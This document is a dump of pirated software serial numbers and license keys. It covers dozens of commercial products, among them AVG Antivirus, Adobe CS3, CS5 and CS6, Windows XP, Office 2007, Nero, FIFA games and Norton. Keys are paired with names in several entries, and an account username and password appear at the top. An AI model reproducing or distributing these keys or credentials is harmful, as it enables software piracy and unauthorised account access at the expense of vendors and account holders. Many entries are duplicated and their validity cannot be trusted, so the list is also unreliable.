        Expire:21-10-2012

        Username:EAV-72535899
        Password:cdedc44tt3
        Expire:21-10-2012


        ========================================================================



        ╚═►avg antivirus 2013 Serial◄═╝


        8meh-r9q3v-zhe2t-92kcr-a9gls-yembr-aced
        8meh-rlkzo-8chhh-hsyka-kauxg-sembr-aced
        8meh-r6633-ypt9h-ycnsr-h42ot-eembr-aced
        8meh-r2cml-sswfw-moxfr-tcrgu-3embr-aced
        8meh-rfod4-sx7r8-jrtqa-jgero-wembr-aced
        8meh-rnzll-2yuqx-79ppa-m3tde-aembr-aced
        8meh-rk82s-pwf92-c33ba-qdw4h-gembr-aced
        8meh-rf22z-an7hs-qdwmr-2eebp-bembr-aced
        8meh-ryh2w-sak7n-h2hga-w73j4-9embr-aced
        8meh-rnxbd-gmngf-bslsr-zjkod-pembr-aced
        8meh-rf4bz-fh4uo-vrv3a-4ch9l-dembr-aced
        8meh-rg9b7-bggvc-pxrcr-jpr2l-hembr-aced
        8meh-rvega-vjyy3-y3dla-8nxy2-6embr-aced


        ========================================================================



        Windows 8 developer preview product key


        6RH4V-HNTWC-JQKG8-RFR3R-36498


        ========================================================================



        AVG Antivirus Professional 2012 Serial Number

        +++++++++++++++++++++++++++++++++++++++
        8MEH-RW2ZU-29S4F-26QCR-WFZV4-BEMBR-ACED
        8MEH-RREY3-L2LQA-LUMOR-UHNK2-6EMBR-ACED
        8MEH-RPDWL-THRLY-O8Z3R-474SC-4EMBR-ACED
        8MEH-RPTGT-KMOL7-EEEVR-KORKD-LEMBR-ACED
        8MEH-RMXLW-HN44A-BABPA-SBK3B-PEMBR-ACED
        8MEH-RCKOP-BP9KK-YW8EA-6K8TK-SEMBR-ACED
        8MEH-RXYFD-JUV72-8922R-FTBZ6-QEMBR-ACED
        8MEH-RAJC2-O3P77-KRRQA-H3SLN-REMBR-ACED
        8MEH-R2CML-SS7FW-MOXFR-TRU8V-3EMBR-ACED
        8MEH-RS47Y-82HT8-GONVA-BCCCZ-DEMBR-ACED
        8MEH-RXYFD-JUV72-8922R-FTDO8-QEMBR-ACED
        +++++++++++++++++++++++++++++++++++++++


        ========================================================================



        Nero 11.2.00400


        Code: 9004-0173-5M17-EU7K-KLPZ-XT4P-2MT3-4PA8


        ========================================================================



        Nero 11.2.01000


        Code: 9004-0173-5M17-EU7K-KLPZ-XT4P-2MT3-4PA8


        ========================================================================



        ╚═►Adobe Flash Professional CS5◄═╝


        Serial Key:→↓←

        1302-1194-4375-5059-8090-0288
        1302-1956-2248-1616-0365-7124
        1302-1645-5592-7683-5740-9343
        1302-1065-1908-3692-6001-0784
        1302-1086-3696-5544-5238-9400
        1302-1339-8680-7615-5184-8324
        1302-1065-1908-3692-6001-0784
        1302-1059-9625-8530-7802-6962
        1302-1339-8680-7615-5184-8324
        1302-1116-8780-8984-8675-8256
        1302-1912-4694-1510-2945-5932
        1302-1059-9625-8530-7802-6962
        1302-1194-4375-5059-8090-0288
        1302-1339-8680-7615-5184-8324
        1302-1956-2248-1616-0365-7124
        1302-1912-4694-1510-2945-5932
        1302-1116-8780-8984-8675-8256
        1302-1956-2248-1616-0365-7124
        1302-1912-4694-1510-2945-5932
        1302-1065-1908-3692-6001-0784
        1302-1835-3972-5775-4732-9757


        ========================================================================



        ╚═►FIFA 12 serials online (PC)◄═╝


        Serial:→↓←

        QJAA-SCPR-2XYK-X3ML-0UNL
        S4LU-NP8Z-GKAD-7GK2-JRLD
        Y7GY-CSUG-3B54-3V1N-0UNL
        MXMD-8GX6-23KL-Q67F-0UNL
        5Y9H 9GCV 6L7F 7GG4 DU6E



        ========================================================================




        ╚═►Adobe CS3 Keygen serial number◄═╝


        Serial number:1326-0651-74702-0424-4066-8309
        Activation number: 3244-5309-7205-7250-5740-2918-5471
        Activation type: Normal



        ========================================================================




        ╚═►Windows XP SP2 geniune key◄═╝


        Serial: JG28K-H9Q7X-BH6W4-3PDCQ-6XBFJ



        ========================================================================




        ╚═►SpeedUpMyPC 2013◄═╝


        Licence Key:→↓←

        SP-EKSPY-W97SD-VRMZN-CWM4C-MJKVH-EHAZ8



        ========================================================================




        ╚═►Game Maker 6◄═╝


        Serial: E3133057BE7AD9E655FEE02F



        ========================================================================


        ╚═►WinUtilities v10.53 Professional Edition◄═╝


        Serial: WYMTGGP-7362-85FE-A519-4F96-QKWU



        ========================================================================





        ╚═►Cyberlink Powerdirector 9◄═╝


        Seiral: BF937-FZ7NB-KHZEY-B3LAP-BNEFL-VT3EW



        ========================================================================




        ╚═►Your Uninstaller Pro 7.5.2012.12 Serial ◄═╝


        Name: sharyn kolibob

        Serial: 000016-9P0U6X-N5BBFB-EH9ZTE-DEZ8P0-9U4R72-RGZ6PF-EMYUAZ-9J6XQQ-89BV1Z



        ========================================================================



        Adobe Photoshop CS3 Master Collection Serial 


        Serial: 1325-1164-8142-5014-6460-3938

        ========================================================================

        PasswordUnlocker PDF Password Remover 5.0.0


        Serial: hzNHEuQvcGvzRyVJHgv9pyiki7kbTQymwmCViiUCjEO0UQmchDw8NwjlmHE09nDe2ztZrUJ3UUtvoQY2CdDIQbzQKzoC0ae7+w3EvYYd9W1UPJ2+1a6z42vAxCf231nV2Mn4A+601rPJwnqJa2FK7kZJOFr3NszWprjzsFAdQgw=


        ========================================================================

        Microsft office 2007 enterprise 32 bit


        Serial: F3DJD-6FFQ4-XQTQF-PGK47-8MDQ8

                  CM9R7-9X4DV-F43J4-JVC67-GYDQ8


        ========================================================================

        bitdefender free edition v10oem



        Serial:  7C7CC-DCA97-71242-F0814


        ========================================================================

        FIFA 2010


        Serial: URU4-HVRD-G8H7-F7G4-1911
                    KKHH-FRTB-L1M2-F5V8-1911
                    URKK-F9Y4-G5U8-33Q1-1911
                    PMXP-49L2-D1G2-85L0-1911
                    J87P-39P7-W8J4-T3F7-1911  

        ========================================================================

        Folder Lock 7.1.1 Final




        serial key: F7-20120725-2-873991



        registration: 58260C22969C0EE8C65E3CB20460E4F44A063486



        serial key: F7-20120725-3-968359

        registration: 4E3A626E0EE4E0CEDE30EE22509858386C7A7CEA


        serial key: F7-20120725-8-354379

        registration :76F60EB08CE6186A88C2E4AE646EAEA8147E4052


        serial key: F7-20120725-3-339758

        registration :C6E26644AA4AA606CC00B46206B2FC129EB256B0



        serial key: F7-20120725-1-691441

        registration :5AB890E642D6400C1678D0640E9E88CA26FA88C4


        serial key: F7-20120725-3-663346

        registration :8AC2E8BAC028EAA26042C018B8B4A6B8F46A1AAA


        serial key: F7-20120725-9-295215

        registration :B6EA60745C24DE70769A1EC4FCD62C5CD8E8FC6A


        serial key: F7-20120725-4-188913

        registration :9CAEC42C5E74CE10065A20D85410601EC4007CFA


        serial key: F7-20120725-6-219585

        registration :9A98B6FC12A60E621E462AAE4EAE70AED4126002


        serial key: F7-20120725-1-869828

        registration :8242FA5E14AE88C89EACF6964068121A2264BCC2


        serial key: F7-20120725-4-863538

        registration :D090E2729622027884288C1E1E46DCC81CD4FE30


        serial key: F7-20120725-8-475696

        registration :42C85E9E8620E404F25412C4EA6852944EA4CA88


        serial key: F7-20120725-9-222467

        registration :7E52F24C3254C40A3802A6924E44B0A21A3060C0


        serial key: F7-20120725-4-436627

        registration :7A52720C8E12A0A80CF8FE9ABA1094089C6EB034


        serial key: F7-20120725-5-224353

        registration :7CEA8028A8F808569AB0AAFECC98B2E896302882


        serial key: F7-20120725-7-112789

        registration :784C1ABE7AAAC8E80680F8BAF00292DE4CDCC4DE


        serial key: F7-20120725-6-137291

        registration :F6FA767AE2DEBCCA1AF64A4E0C88B82844781E94


        serial key: F7-20120725-1-619748

        registration :82C820C8825CF4B4D8F8BA46D42EA4A2CAC41A8


        ========================================================================

        MP3 Encoder 1.0


        s/n: _23456789a_ydcgwvaf
        s/n: _23456789a_ydcgwvaf

        ========================================================================

        Defrag Professional Edition 4.0.508


        Name: Hans Mueller 
        License:  DPM1-0VNZ-002Q-X32X-033Y

        Name: Hans Mueller 
        License: DPM1-0VNZ-002Q-X32X-033Y


        ========================================================================

        TraceRoute 2.0.2


        s/n: Key-B03-30-230-209-164-3899
        s/n: Key-B03-30-230-209-164-3899

        ========================================================================
        Norton Internet Security 2012

        Serial: JT888GWHQ7RQ32B932BB89XJM Only 1 User !

        ========================================================================

        Angry Birds Space


        Serial: THET-ALEV-LEFR-USWO OR 00a00b00c00d

        ========================================================================

        PC Optimizer Pro


        Serial: XUV4-9MP-6AFC-NN8-7NP|XUV4-9MP-6AFC-NN8-7NR


        ========================================================================


        ╚═► WinPDFEditor v1.0.3 ◄═╝ 


        BAKW-R82A-D42N-UNFG
        BPNW-R26A-D99N-LIWG
        BPOW-R90A-D88N-HIGG
        BBUW-R26A-D59N-CAWG
        BDOW-R13A-D25N-CLDG
        BCFW-R93A-D39N-YETG

        ========================================================================


        ╚═► Uniblue Driverscanner 2013 Serial ◄═╝


        Serial: DS-PKMGJ-9WRLL-G9XVB-UBXXE-MLY8P-MSGSV


        TYPE THIS SERIAL YOURSELF.SIMPLY COPYING AND PASTING WILL NOT ACTIVATE THE SOFTWARE.





        ========================================================================


        ╚═►XILISOFT DVD RIPPER ULTIMATE 5.0.46.1212 ◄═╝



        646DF9DC-EFE0-E866-3790B-A73A-8CEF-B6AF
        CB7DB302-29D9-96F5-AE6DE-B40A-4937-8F46
        38F60D65-30E0-CB98-7F118-28CD-3601-F179
        181CCB43-477A-99BB-34F4A-E9C7-B5C3-8A2A
        1E552ADD-56B1-8907-9A5AE-B16A-99B8-B167


        ========================================================================


        ╚═► PC Tools Internet Security 2012 ◄═╝


        Name: Bin ma 
        License: 49DF-D50D-C304-08E9-8DDC-D3DF-
        D505-46FC-94E8-1CA9 OR 
        License key: A5CB-49B9-52D8-E24D-33C4-6A44-F953-CA9D-CA3C-123F 

        License Name: Max Porter 
        License Code: BF54-0053-F550-4C81-2E21-4E30-66D9-707A-707D-2FDA 

        Name: Heribert Muller 
        License key: CAA6-007D-5B58-1C97-2D45-A10C-3ABF-E802-650C-A4F8 

        Name: Bruno Herz 
        License key: 7D71-265D-1629-D483-DDB0-B333-0917-CC09-D503-972F 

        Name: Viktor Werk 
        License key: 7935-3160-FF79-6D10-E04A-CDEB-3810-9100-1382-5DA3 

        Name: Viktor Vogel 
        License key: D08D-207A-07EE-B7E0-6C56-CB4F-3A3E-9950-169C-B6D1 

        Name: Lothar Wolf 
        License key: 8965-E188-D75C-F544-F58E-1298-03DC-6CE8-46A1-B6B4 

        Name: Olga Feist 
        License key: 4D1F-2459-A574-B918-956E-F50A-2C77-C083-95D7-2C23 

        Name: Pidrilo Dushnoy 
        License key: A96D-2709-8445-16AA-8D18-6CB0-A763-41A4-688D-ED1

        ========================================================================


        ╚═►Adobe photoshop cs6 Extender◄═╝



        Serial: PCR-Y5P77P-7EZ2QG-77UQ97-5D2MNQ